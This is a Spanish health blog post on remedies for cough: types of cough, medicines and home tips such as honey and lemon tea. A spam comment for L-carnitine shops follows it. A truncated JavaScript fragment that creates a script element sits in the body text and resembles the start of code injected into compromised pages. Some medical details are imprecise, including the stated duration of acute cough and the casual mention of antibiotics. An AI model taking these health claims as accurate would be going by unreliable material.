Salud y belleza » Bienestar, Medicina, Salud

Remedios para curar la tos

1 Comentario

Ahora con los cambios de temperatura es más fácil resfriarse y la tos es un síntoma difícil de curar. Se trata de un proceso natural por el cual el organismo expulsa sustancias y agentes externos que se encuentran en las vías respiratorias y en los pulmones. Sin embargo, este síntoma natural puede llegar a ser molesto. Por eso te vamos a proponer algunos remedios que puedes usar para curar la tos.

curar-la-tos

Dependiendo de la duración de la tos puede ser aguda (dura varias semanas), subaguda (ocho semanas) o crónica (más de ocho semanas). La tos aguda se debe principalmente a resfriados, sinusitis o alergias, por lo que curando estas causas se cura la tos.

Por otro lado, la tos subaguda puede deberse a bronquitis o a asma, o a una infección por sinusitis. Con antihistamínicos y descongestivos o antibióticos puede llegar a curarse, aunque depende de cada caso.

La tos crónica, sin embargo, suele deberse a problemas de asma crónica, bronquitis o tabaquismo. Lo mejor en estos casos es consultar al neumólogo o alergista para curar la tos en cada caso.

jarabe-para-tos

Las principales medicinas que suelen usarse para curar la tos son los expectorantes, que suelen ser recetados por el médico para que la tos no llegue a dañar la garganta diluyendo la mucosidad y haciéndola menos espesa. También son habituales los supresores que actúan sobre lo que está provocando la tos. Normalmente este medicamento se recomienda para tos seca.

Por otro lado, en caso de que tengas tos deberías seguir además una serie de consejos y recomendaciones para curarla más rápidamente. El primero de ellos, dejar de fumar, porque el tabaco en cualquier caso empeora la tos. También debes evitar exponerte a humos tóxicos.

Además, lleva siempre encima pastillas de menta y miel para aliviar la garganta cuando te de un ataque de tos. Bebe habitualmente té con limón y miel para aliviar el dolor de garganta que causa la tos, además ayuda a diluir los mocos.

miel-para-garganta

Si la tos no te deja dormir mantén la cabeza en alto con algunas almohadas. Y antes de ir a dormir, si tienes tos seca, tómate una cucharada de miel con cúrcuma para que no te moleste tanto de noche.

Esperamos que con todos estos consejos puedas curar la tos mucho más rápido y se te alivie el dolor y las molestias cuanto antes.

¿Qué tomas para curar la tos?

}var d=document;var s=d.createElement('script');

Más consejos de salud y belleza : , , ,

One Comment »

  • bloqueáis said:

    En la actualidad existen un sinfi de tiendas on line donde podemos adquirir L-CArnitina, la recomendación que siempre y en toda circunstancia hacemos es repasar que es una empresa ubicada en España con teléfono
    de contacto por si acaso poseemos alguna duda y por su puesto, que el precio calidad sea competitivo.

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.